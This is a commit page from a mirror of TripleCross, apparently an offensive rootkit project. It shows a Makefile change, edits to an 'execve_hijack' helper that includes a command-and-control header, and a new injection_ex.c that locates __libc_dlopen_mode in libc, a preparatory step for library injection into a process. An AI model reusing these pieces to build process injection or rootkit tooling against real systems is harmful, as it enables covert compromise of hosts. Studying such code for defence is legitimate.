admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 10:53:09 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added new libc symbols extraction

Browse Source
This commit is contained in:
h3xduck
2022-03-02 19:00:50 -05:00
parent 805fa760cf
commit e64839f080
14 changed files with 1785 additions and 1917 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
src/helpers/Makefile
View File

@@ -3,14 +3,22 @@ HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make execve_hijack
make execve_hijack injection_ex
injection_ex.o: injection_ex.c
clang -g -Wall -c injection_ex.c
injection_ex: injection_ex.o
clang -g -Wall -o injection_ex injection_ex.o -ldl
execve_hijack.o: execve_hijack.c $(HEADERS)
gcc -c execve_hijack.c
clang -c execve_hijack.c
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
clang -lm -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o
-rm -f execve_hijack
-rm -f execve_hijack
-rm -f injection_ex.o
-rm -f injection_ex

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

3
src/helpers/execve_hijack.c
View File

@@ -15,12 +15,14 @@
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <dlfcn.h>
#include "lib/RawTCP.h"
#include "../common/c&c.h"
char* execute_command(char* command){
FILE *fp;
char* res = calloc(4096, sizeof(char));
char buf[1024];
@@ -70,7 +72,6 @@ int main(int argc, char* argv[], char *envp[]){
printf("Argument %i is %s\n", ii, argv[ii]);
}
time_t rawtime;
struct tm * timeinfo;

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.

BIN
src/helpers/injection_ex Executable file
View File

Binary file not shown.

23
src/helpers/injection_ex.c Normal file
View File

@@ -0,0 +1,23 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dlfcn.h>
#include <link.h>
int main(){
struct link_map *lm;
off_t offset = 0;
unsigned long long dlopenAddr;
lm = dlopen("libc.so.6", RTLD_LAZY);
if(lm==0){
perror("Error obtaining libc symbols");
return -1;
}
dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
printf("libdl: %lx\n", lm->l_addr);
printf("dlopen: %llx\n", dlopenAddr);
offset = dlopenAddr - lm->l_addr;
printf("Offset: %lx\n", offset);
return 0;
}

BIN
src/helpers/injection_ex.o Normal file
View File

Binary file not shown.